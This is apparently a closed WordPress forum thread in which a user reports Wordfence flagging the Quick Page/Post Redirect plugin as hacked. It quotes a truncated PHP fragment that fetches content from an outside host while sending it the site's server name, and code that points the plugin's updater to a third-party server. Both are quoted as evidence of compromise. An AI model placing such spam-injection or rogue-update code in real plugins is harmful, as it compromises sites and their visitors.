Wordfence Flagging Plugin As Hacked
-
“File appears to be malicious or unsafe: wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
Type: File”/wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
File Type: Plugin
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: !defined(‘CREDIT’)) {\x0d\x0a\x09\x09\x09\x09\x09$ctx=stream_context_create(array(‘http’=>array(‘timeout’ => 3)));\x0d\x0a\x09\x09\x09\x09\x09try{\x0d\x0a\x09\x09\x09\x09\x09\x09$credit=@file_get_contents(‘https://w.anadnet.com/bro/3/’.$_SERVER[‘SERVER_NAME’] . $_SE…The issue type is: Suspicious:PHP/CREDIT.content_injection.13029
Description: Suspicious PHP code that injects SPAM into site content—
After a reinstall and a fresh scan, Wordfence still thinks there are problems.
Modified plugin file: wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
Type: FileDetails: This file belongs to plugin "Quick Page/Post Redirect Plugin" version "5.2.3" and has been modified from the file that is distributed by WordPress.org for this version. Please use the link to see how the file has changed. If you have modified this file yourself, you can safely ignore this warning. If you see a lot of changed files in a plugin that have been made by the author, then try uninstalling and reinstalling the plugin to force an upgrade. Doing this is a workaround for plugin authors who don't manage their code correctly.
And, it appears, that among other things:
36 // update functionality 37 require dirname(__FILE__).'/updater/plugin-update-checker.php'; 38 $myUpdateChecker = Puc_v4_Factory::buildUpdateChecker( 39 //'https://anadnet.com/updates/plugin.json', 40 'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin', 41 __FILE__, //Full path to the main plugin file or functions.php. 42 'quick-pagepost-redirect-plugin' 43 );
- The topic ‘Wordfence Flagging Plugin As Hacked’ is closed to new replies.